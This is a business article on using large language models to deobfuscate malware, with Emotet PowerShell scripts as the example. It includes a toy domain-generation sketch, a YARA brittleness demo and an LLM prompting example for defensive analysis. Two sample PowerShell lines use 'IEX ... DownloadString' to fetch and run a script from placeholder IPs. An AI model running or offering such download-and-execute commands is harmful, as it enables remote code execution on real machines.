Large language models (LLMs) transform AI capabilities in language processing

One of the most significant developments driving modern tech is the rise of large language models, or LLMs, like GPT and BERT. Trained on billions of real-world examples, these models learn patterns in language and adapt to new contexts. That means they can generate responses, translate languages, summarize complex documents, and answer nuanced questions.

Behind this leap is access to massive datasets and a big jump in processing power. Graphics processing units (GPUs) and specialized chips like TPUs accelerated how fast we can train and scale these models. As a result, we can build systems that understand human language and continue to improve over time as they are exposed to more data. That performance shows up in tangible business applications across sectors, including customer support, content creation, legal research, and code generation.

It’s worth noting: this shift didn’t happen overnight. Years of foundational research converged with market-ready infrastructure and easy-to-use development tools. What used to sit behind research papers is now finding its way into business systems, helping companies automate intelligently, scale productivity, and make better decisions, without requiring a language expert on every team.

Modern malware obfuscation necessitates advanced deobfuscation techniques

Today’s malware is adaptive, layered, and deliberately hard to track. Obfuscation has become a default strategy for attackers. Code is packed, variables are replaced with random labels, dead code is injected to throw off analysts, and domain generation algorithms (DGAs) are used to hide connections with command-and-control servers. These attackers iterate constantly, evolving their methods in a consistent, deliberate way.
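To make that last tactic concrete, here is a deliberately harmless Python sketch of how a domain generation algorithm works. The seed, date scheme, and domain format are invented for illustration and are not drawn from any real malware family:

```python
import hashlib
from datetime import date

def toy_dga(seed: str, day: date, count: int = 5) -> list[str]:
    """Derive a daily list of rendezvous domains from a shared seed.

    Both the implant and its operator can compute the same list offline,
    so no contact address ever needs to be hard-coded in the payload.
    """
    domains = []
    for i in range(count):
        material = f"{seed}:{day.isoformat()}:{i}".encode()
        digest = hashlib.sha256(material).hexdigest()
        # Map the first hex characters of the hash to lowercase letters.
        label = "".join(chr(ord("a") + int(c, 16) % 26) for c in digest[:12])
        domains.append(label + ".com")
    return domains

if __name__ == "__main__":
    # A defender who recovers the seed can pre-compute and block the same list.
    print(toy_dga("example-campaign", date(2025, 4, 29)))
```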

This sophistication breaks traditional security models. Static detection methods that once worked, such as signature-based systems or preset rule engines, are quickly outdated by even small changes to the malware’s codebase. Yara rules, or CyberChef recipes that depend on predictable patterns, break down once the code is altered even slightly. What was detectable last week becomes invisible today.
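The brittleness is easy to demonstrate. The hypothetical Python snippet below assumes the yara-python package is available and uses an invented rule against invented, harmless script fragments: a literal-string rule catches the original sample but misses a variant where a single variable has been renamed.

```python
import yara  # assumption: the yara-python package is installed

# A deliberately naive rule that keys on literal strings, including a variable name.
RULE = r"""
rule suspicious_downloader
{
    strings:
        $url_var  = "$payloadUrl" ascii
        $download = "DownloadString" ascii
    condition:
        all of them
}
"""

# Invented, harmless script fragments using a reserved documentation IP.
original = '$payloadUrl = "http://198.51.100.7/a"; IEX (New-Object Net.WebClient).DownloadString($payloadUrl)'
variant  = '$qzx1 = "http://198.51.100.7/a"; IEX (New-Object Net.WebClient).DownloadString($qzx1)'

rules = yara.compile(source=RULE)
print("original detected:", bool(rules.match(data=original)))  # True
print("variant detected: ", bool(rules.match(data=variant)))   # False: one rename defeats the rule
```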

Reverse engineering this kind of malware is no small challenge. Analysts usually need to convert machine code into something readable just to begin their investigation. Often, they’re digging through layers of noise to find just a few lines of malicious instructions. Even when tools like IDA Pro or Ghidra help, the process still relies heavily on manual analysis. And just when patterns are identified, malware authors push a new version, sidestepping rules and filters all over again.

For executives responsible for risk, this should underscore a simple fact: static defenses aren’t enough when malware is designed to avoid precisely those defenses. Rapid iteration from attackers means your security team must have tools that adapt just as fast. Investing in capabilities that evolve in real time, especially those powered by AI or machine learning, is the only way to keep up.

Malware campaigns now routinely use domain generation algorithms to cloak C2 infrastructure, while static detection patterns like Yara rules and automated CyberChef recipes are easily circumvented. These tactics make it clear: attackers understand the gaps in today’s defensive tools and are optimizing around them. Organizations can’t afford to be reactive; they have to anticipate and evolve.

LLMs offer a promising solution for automating malware deobfuscation

Large language models are built to process and understand complex patterns in language and code. That’s not limited to human language; it includes programming languages, scripting environments, and obfuscated logic. This makes them a logical candidate for malware deobfuscation, where traditional tools struggle to adapt to changes in structure, naming, or syntax.

LLMs do more than just read code; they interpret it. When given an obfuscated script packed with misleading variables, dead code, or noise, they can isolate the actual logic, identify suspicious parts, and make that code comprehensible again. They don’t rely on fixed rules or static mappings like traditional deobfuscators. Instead, they learn from examples and apply context, adapting even when the malware’s format changes.
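As a rough illustration of what that looks like in practice, the sketch below prompts a general-purpose model to rewrite a harmless, invented stand-in for an obfuscated PowerShell one-liner. The client library, model name, and prompt wording are assumptions made for the example, not details from any particular deployment or from the study discussed later.

```python
from openai import OpenAI  # assumption: using the OpenAI Python SDK as the client

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# Harmless, invented stand-in for an obfuscated PowerShell one-liner.
OBFUSCATED = (
    '$k9f = "h" + "ttp://203.0.113.5/x.ps1"; '
    '$w = New-Object Net.WebClient; IEX $w.DownloadString($k9f)'
)

SYSTEM_PROMPT = (
    "You are assisting a malware analyst. Rewrite the script with meaningful "
    "variable names, strip dead code, explain what it does, and list any "
    "network indicators you find. Never execute anything."
)

response = client.chat.completions.create(
    model="gpt-4o",   # model choice is an assumption, not a detail from the study
    temperature=0,    # deterministic output is easier to review and compare
    messages=[
        {"role": "system", "content": SYSTEM_PROMPT},
        {"role": "user", "content": OBFUSCATED},
    ],
)
print(response.choices[0].message.content)
```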

This allows threat analysts to identify key threat indicators faster, like command-and-control (C2) addresses, loader behavior, or script-based payload staging. Extraction of Indicators of Compromise (IOCs) becomes less dependent on deep manual analysis or purpose-built tools that need constant rule updates. LLMs help close the gap between detection and action, making it possible to scale threat intelligence across a wider set of attack vectors and variants.
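A minimal sketch of that post-processing step might look like the following, with intentionally simple, illustrative patterns rather than production-grade IOC parsing:

```python
import re

# Intentionally simple patterns; a production pipeline would also validate,
# check results against allowlists, and defang them before sharing.
URL_RE  = re.compile(r"""https?://[^\s"'<>,)]+""", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def extract_iocs(deobfuscated_text: str) -> dict[str, list[str]]:
    """Pull candidate network indicators out of the model's deobfuscated output."""
    return {
        "urls": sorted(set(URL_RE.findall(deobfuscated_text))),
        "ipv4": sorted(set(IPV4_RE.findall(deobfuscated_text))),
    }

sample = "Payload staged from http://203.0.113.5/x.ps1, fallback C2 at 198.51.100.7."
print(extract_iocs(sample))
```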

For security leaders, LLMs reduce time-to-insight, surface hidden threats, and add a level of adaptability that rule-based systems simply don’t offer. And because they can be integrated with platforms like IDA Pro and Ghidra, they fit into existing reverse engineering workflows without forcing teams to rebuild their tooling.

Empirical validation of LLMs in deobfuscating real-world malware

Theoretical strengths are important, but what matters most is performance in the real world. That’s exactly what the recent study on LLMs and malware deobfuscation set out to test: how these models perform when exposed to actual malicious code. The approach focused on PowerShell scripts, which are short, manageable, and common in malware payloads, making them a good match for LLM input constraints and capabilities.

The dataset centered on Emotet, a malware strain previously identified by Europol as “the most dangerous malware.” It’s known for its use of obfuscation, polymorphism, and rapid chaining of components. Using Emotet’s PowerShell scripts as the test case provided an authentic, high-stakes environment for evaluating model performance. The study analyzed how well LLMs could parse, clean, and summarize these scripts to extract actionable threat intelligence.

The results were solid, even without task-specific fine-tuning. LLMs successfully deobfuscated complex scripts and extracted critical indicators, suggesting strong generalization from pretraining. That means they can be deployed in real-world threat environments with minimal overhead and still deliver value. This reduces dependency on constant rule reengineering or narrow tools that break as soon as attackers iterate.

For security strategy, this marks a shift. It’s about automating workflows that previously needed specialized analysts. When LLMs are integrated into the threat analysis pipeline, they act as force multipliers: speeding up investigations, reducing analyst fatigue, and increasing detection fidelity. They help teams move faster without compromising detail or accuracy.

Main highlights

  • LLMs are redefining language and code comprehension: Large Language Models like GPT and BERT have moved beyond basic NLP to handle complex code and logic, enabling practical, scalable automation in areas like translation, customer interaction, and now, threat analysis.
  • Modern malware outpaces static security tools: Malware authors rapidly evolve obfuscation tactics like variable randomization and domain generation, rendering rule-based detection methods obsolete. Leaders should invest in adaptable, AI-driven threat detection to stay ahead.
  • LLMs unlock scalable, automated malware deobfuscation: Unlike static tools, LLMs can interpret obfuscated scripts and extract threat indicators from otherwise indecipherable payloads. Security teams should integrate LLMs to reduce manual overhead and boost investigation speed.
  • Real-world tests prove LLMs are threat-ready: LLMs performed effectively against live Emotet malware data without custom training, demonstrating immediate value in real-world application. Executives should consider LLM integration to strengthen cyber threat intelligence pipelines at scale.

Alexander Procter

April 29, 2025

6 Min